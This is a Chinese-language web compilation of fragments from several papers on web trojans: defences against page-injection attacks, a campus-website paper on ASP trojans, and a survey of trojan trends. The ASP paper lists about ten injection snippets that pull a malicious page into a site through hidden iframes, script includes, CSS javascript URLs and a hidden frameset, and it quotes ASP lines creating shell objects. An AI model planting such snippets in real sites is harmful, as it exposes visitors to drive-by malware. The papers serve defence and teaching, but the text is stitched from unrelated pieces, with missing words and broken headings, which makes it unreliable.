根据网页木马的防范位置,可以从三个方面入手,它们分别是基于网站服务器端的网页挂马防范、基于的网页木马防范以及基于客户端网页木马防范。
(1)基于网站服务器端网页挂马防范。网站服务器端网页挂马防范是网页木马防范中的第一个环节,网站挂马的主要途径有:利用网站服务器系统漏洞、利用内容注入等应用程序漏洞、通过广告位和流量统计等第三方内容挂马等。利用网站服务器系统漏洞来进行攻击是一种常见的网页挂马途径,攻击者利用服务器的漏洞获取权限后,可以对页面进行篡改。因此,网站服务器应打好系统漏洞补丁,或按照一些入侵检测系统来防范这些木马程序的攻击。
3用网站服务器系统漏洞
(1)基于的网页木马防范。基于的网页木马防范是在页面被客户端浏览器加载之前,在一个 shadow 环境(即)中对页面进行一定的检测或处理。主要可以从几个方面着手:一是“检测-阻断”式的网页木马防范方法,这种方法是在处进行网页木马检测;二是基于脚本重写的网页木马防范方法;三是基于浏览器不安全功能隔离的网页木马防范方法。这种方法主要由来解析页面并执行脚本,它需要大量的时间,在实际应用中难以适应。(2)基于客户端网页木马防范。基于客户端网页木马防范主要应用在客户端,比较常见的方法有URL 黑名单过滤、浏览器安全加固、操作系统安全扩展等。通过Google来检测索引库中的页面,生成一个URL黑名单,然后Google的搜索引擎会将URL黑名单中的搜索结果进行标记。浏览器安全加固是通过在浏览器中增加一些检测功能来对浏览器进行安全加固,操作系统安全扩展主要用来阻断网页木马攻击流程中未经用户授权的恶意可执行文件下载、安装/执行环节。
4 总结
网络木马是恶意程序在网络中传播的一种常见方式,它主要是通过网络客户端对服务器的访问,利用系统安全漏洞隐蔽的将网页木马恶意程序植入到客户端,客户端通过浏览网页,执行恶意程序后感染木马病毒,给计算机用户带来严重危害,基于Web的被动攻击模式能将网页木马感染到大量的客户端,它具有隐蔽性高、传染快等特点,因此,安全研究人员必须对网页木马高度重视,应针对网页木马的机理、特征进行多方面的研究,才能针对其结果做出相应的防范措施,避免网页木马的扩散与传播,对于网络安全人员来说,网页木马的防范工作将是一项任重而道远的工作。
作者单位
木马程序篇7
关键词:网页篡改;ASP木马;FSO组件
中图分类号:TP393文献标识码:A文章编号:1009-3044(2008)34-1952-02
Campus Website has been Tampered with the Research and Prevention
ZHANG Ling, LIU Sheng-zhen, YANG Xiao-hua
(Shangqiu Medical College, Shangqiu 476100, China)
Abstract: how to solve the illegal malicious hackers to attack, how to ensure that the school's website will not be tampered with to prevent the loss of self-image and how to solve the resulting wide range of other issues, Information technology has become a cutting-edge issues.
Key words: page tampering; ASP horse; FSO components
1 引言
在社会信息化飞速发展的今天,计算机网络已经成为高校工作和生活的一部分,高校开始通过网络校园新闻、通知公告、招生查询和校园办公等等。而越来越多的高校为了适应社会的发展,树立自身良好的形象,扩大自身在社会的影响,都已经在Internet中建立起自己的网站。这些网站往往代表高校的形象,但网站却常常成为黑客攻击的首选对象。黑客通过各种手段攻击网页的漏洞,从而获取、破坏、篡改各种重要信息,给各高校造成重大的经济损失和恶劣的社会影。如何解决不法黑客的恶意攻击,如何保证网站页面不被篡改,防止自身形象受到损失,以及如何解决由此带来的其它多方面的问题,已经成为信息技术的一个前沿课题。
2 什么是ASP木马
它其实就是用ASP编写的网站程序,甚至有些ASP木马就是由ASP网站管理程序修改而来的。和其它ASP程序没有本质区别,只要能运行ASP的服务器就能运行它,这种性质使得ASP木马非常不易被发觉。和其它ASP程序的区别在于ASP木马是入侵者上传到目标空间,并帮助入侵者控制目标空间的ASP程序。要想禁止ASP木马运行就等于禁止ASP的运行,显然这是行不通的,这也是为什么ASP木马猖獗的原因。
3 入侵原理
首先分析如下代码:
Set o script = Server.CreateObject("W script .SHELL") "建立了一个名为o script的W script.SHELL对象,用于命令的执行"
Set o script Net = Server.CreateObject("W script .NETWORK")
Set oFileSys = Server.CreateObject("script ing.FileSystemObject")
ASP木马主要是通过以上3个组件运行,第一个是FSO组件,需要FSO支持也就是" script ing.FileSystemObject"项的支持,是不是删除这个组件就可以了,不可以的,因为现在很多程序都是要用到FSO这个组件的,所以不能限制,不然正常的程序也运行不了。第二个是“shell.application”和“Wscript.SHELL”等危险组件。一般的木马都是要使用这几个组件的,即使你把FSO组件限制的话,你不去限制其它组件,一样不能起到防范的效果,对于FSO组件之外的其它的几个组件,我们平时用的很少,所以我们可以直接在注册表中的HKEY_CLASSES_ROOT中找到,找到“shell.application”、“W script.SHELL”等危险的脚本对象(因为它们都是用于创建脚本命令的通道)进行改名或删除,也就是限制系统对“脚本SHELL”的创建,ASP木马也就成为无本之木、无米之炊,运行不起来。要想入侵,就要将ASP木马上传到目标服务器,这点很重要, 那么入侵者如何上传ASP木马呢?入侵者多是利用服务器中已有的具有上传功能的ASP程序来实现的。正常情况下,这些可以上传文件的ASP程序都是有权限限制的,大多也限制了ASP文件的上传。(比如:可以上传图片新闻、图片管理程序、及可以上传更多类型文件的论坛程序等)但由于存在人为的ASP设置错误及ASP程序本身的漏洞,给了入侵者可乘之机,实现上传ASP木马。只要ASP木马上传到目标服务器,入侵者就可以运行它,完成对目标服务器的控制。
4 几个常见的挂马实例
1) 框架挂马
<iframe src=“地址” width=0 height=0></iframe>
2) js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>")
保存为xxx.js, 则JS挂马代码为
<script language=javascript src=xxx.js></script>
3) js变形加密
<SCRIPT language="JScript.Encode" src=地址></script>
4) body挂马
<body ></body>
5) 隐蔽挂马
top.document.body.innerHTML=op.document.body.innerHTML+'\r\n
<iframe src="地址"></iframe>';
6) css中挂马
body
{
background-image:url('javascript:document.write("<script src=地址></script>")')
}
7) 图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
9) 伪装调用
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
10) 高级欺骗
<a href="地址" >页面要显示的内容</a>
<SCRIPT Language="JavaScript">
function wang ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,
resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10")
}
5 防范措施
首先大家可以根据下面的安全级别,评估一下自己网站被ASP木马入侵的风险度。
网站中没有任何上传程序和论坛程序――非常安全;
网站中有上传程序或论坛程序,只有管理员可以上传,并对程序数据库做了保护措施――一般安全;
网站中有上传程序或论坛程序,有许多用户可以上传程序,对程序数据库没有做保护措施――非常危险。
这个安全级别只是让大家对学校服务器的安全有一个初步认识,接下来我们要说说具体的防范措施了。
1) 我们建议学校通过ftp来上传、维护网页,尽量不安装ASP的上传程序。
2) 对ASP上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。可以在不需要上传时将实现上传的ASP文件改名或删除,如upload.ASP、upfile.ASP等,然后在需要使用时再通过ftp恢复原名或重新上传。
3) ASP程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
4) 到正规网站下载ASP程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。建议学校使用.mdb的数据库文件扩展名,因为学校服务器设置了.mdb文件防下载功能。
5) 要尽量保持程序是最新版本。
6) 不要在网页上加注后台管理程序登陆页面的链接。
7) 为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。
8) 要时常备份数据库等重要文件。
9) 日常要多维护,并注意服务器中是否有来历不明的ASP文件。尤其是用来专门存放上传文件的目录,如:uploadfile、uploadsoft等。如果发现不明的*.ASP或*.exe文件应该立即删除,因为这些文件有90%的可能是入侵程序。
10) 一旦发现被入侵,除非学校自己能识别出所有木马文件,否则要删除所有文件。重新上传文件前,所有ASP程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。
11) 安装入侵检测系统,及时更新杀毒软件。
6 结束语
总之,防范ASP木马的重点就在于如何确保学校服务器中ASP上传程序的安全。只要大家能按照上述几种防范措施操作,我们的网页就能得到安全保护,从而大大降低网页被篡改的可能性。
参考文献:
[1] 石志国.计算机网络安全教程[M].北京:北京交通大学出版社,2004.
[2] 张军.ASP动态网站设计经典案例[M].北京:机械工业出版社,2005.
木马程序篇8
【关键词】木马 发展趋势 解决办法
木马通常指潜伏在电脑中,可受外部用户控制以窃取本机信息或者控制权的程序。与常见的病毒不同,它将自身伪装吸引用户运行,向施种者提供打开被种者的电脑,使施种者通过远程操控,任意窃取被种者的文件。木马通过各种各样的方式伪装在用户的电脑中,虽然病毒防御技术已经发展的相当迅速了,但木马病毒却仍然有着顽强的抵抗力。
1 木马入侵的趋势
1.1 恶意软件及垃圾广告
木马利用一些恶意网站误导使用者点击,自动安装、网页挂马、和常用软件捆绑等方式进行传播。主要有:自动弹出广告;变换图标进入各类推销站点和恶意网站;修改主页为色情和广告网站;安装常用软件,安装后自动添加许多流氓软件等。这种木马虽然很容易清除,但由于其不断变换样式,依托的宿主名目繁多,所以杀毒软件很少有专门的查杀工具,让人总是猝不及防。
1.2 针对个人信息的盗取增强
自木马诞生以来,信息窃取由原来的恶作剧、炫耀式的攻击转变为为了产生非法所得为目的的攻击方向。主要种类有:盗取网银账户;盗取网游或其它游戏账号的密码;盗取股票账户;盗取网购帐户;盗取智能手机通讯录及账号;针对某些政府机构、特种行业和公司的邮件木马;盗取图纸设计;针对银行和企业等商业组织的数据库木马。
1.3 加强了系统攻击的深度和破坏性
随着杀毒软件不断升级更新,木马病毒的侵入难度加大,一些病毒制造者便开始对电脑系统的底层技术加以攻击,通过绕过杀毒软件和早于操作系统运行等方式引发木马,使查杀难度越来越大,一旦中马,轻者格式化、更换硬盘,重者只有重刷BIOS闪存。
1.4 欺骗性及隐匿性
随着网络服务的不断增多,各类木马通过使用各种手段隐匿自身,欺骗用户安装下载,使用户在不知不觉下中了木马,造成一定的危害。典型的有:攻击常用的的软件网站,或建立恶意网站,将病毒木马、代码捆绑在软件安装文件中,正常软件和木马软件同时安装;替换正常程序,在运行时同步激活木马;通过修改病毒库升级包或系统补丁,达到修改注册表,运行木马的目的;修改合法程序,将木马程序改名为系统进程、服务、软件驱动名称、修改系统进程捆绑恶意代码,同时结合注册表的修改,达到隐藏的目的;木马安装后,通过删除木马原文件,防止杀毒软件的查杀。
1.5 混合型攻击
这种攻击的特征为木马和其他病毒的捆绑。例如:通过木马感染病毒,通过病毒下载木马程序,利用这种多方面入侵的方式,可同时获得用户的各种信息,这种木马危害极性大,并难以彻底清除。
1.6 智能手机系统成为新战场
手机系统功能日益强大,与网络连接日益频繁,与个人的生活也密切相关,但不断出现的恶意软件在提醒我们:“智能手机(安卓)正在成为黑客的新战场”。手机一旦中了病毒,就会引起信息泄露,资金丢失等后果,其危害性和风险系数不断上升。常见的主要有:通过安装木马程序,轻松窃取用户的各种信息和帐号密码;与有不良记录的SP商合作让用户订制各种无用的业务;中马手机在用户不知情的情况下,下载大量垃圾信息,耗费网络流量;使用户的手机操作变慢,直到崩溃;利用木马远程操作手机,盗取用户的通话记录和短信等私人信息。
2 如何解决木马的新危害
2.1 网站安全的有效管理和监督
保护网站的安全需要做到:
(1)正规网站涉及到的金融业务、数据信息下载等工作有待提高。目前仍有很多政府、金融机构等部门的网站安全问题需要改进,特别是相关的管理人员的技术水平、安全意识不到位。
(2)加强对网站的安全设备的投入,技术力量的提升,加大相关管理制度的监管和立法。
2.2 安全防护的警惕性和及时性
随着杀毒技术的不断完善,病毒木马的侵入难度也越来越大,木马从出现到查杀的间隔也越来越短,这更促使病毒的制造者不断更新出新的木马变种,虽可以查杀,但前期的危害也不可小觑。对付这些病毒,需要做到:及时安装和更新杀毒软件和防火墙的病毒库;不浏览不健康、不安全的网站;不点击自动弹出的中奖等不确定的链接;不到不了解的网站下载软件,安装过程发现捆绑的异常现象及时终止;不打开陌生人提供的邮件和链接;使用移动存储要先杀毒再使用;不被仿冒网站诱导,特别是网购和金融支付平台等等。
2.3 整治木马产业链
目前,我国已经形成了由服务提供集团、利益实施集团两大集团和一条渠道组成的木马产业链。服务集团由程序编写者、漏洞开发者、程序打包者和程序的托管服务提供商组成,这样木马病毒就具备了大范围传播的能力;而实施集团则由信用卡盗窃者、敲诈勒索者、不正当竞争者、垃圾邮件发送者组成,这样就为木马创建了一定的需求市场。这两个集团通过僵尸网络实现服务和金钱的交换,从而实现一个巨大的地下产业链。
当前网络方面立法还存在一定漏洞。为了合理有效解决当前网络木马病毒泛滥的问题,还应对程序的制作、销售及使用进行加强管理也是十分重要的举措。
2.4 强化网上交易平台的管理及建设
随着网上支付的业务不断普及,第三方支付机构平台的安全防护、支付软件的安全漏洞问题也变得日益严重。特别是一些机构安全意识淡泊,安全防护力度不够,从而导致措施执行不到位,制度无法执行的现象,使用户的交易安全和个人信息存在很大的风险。安全意识薄弱是安全问题产生的根源,所以说强化网上交易平台的管理及建设刻不容缓。
参考文献
[1]朱圣军.智能手机病毒与信息安全[J].信息安全与通讯保密,2011(05).
[2]贾建忠.木马危害的新发展及对策[J].软件,2011(02).
作者简介
刘城汾(1977-),男,山西省吕梁市人。大学本科学历。现为山西省吕梁市科学技术局助理研究员,研究方向为计算机网络。
作者单位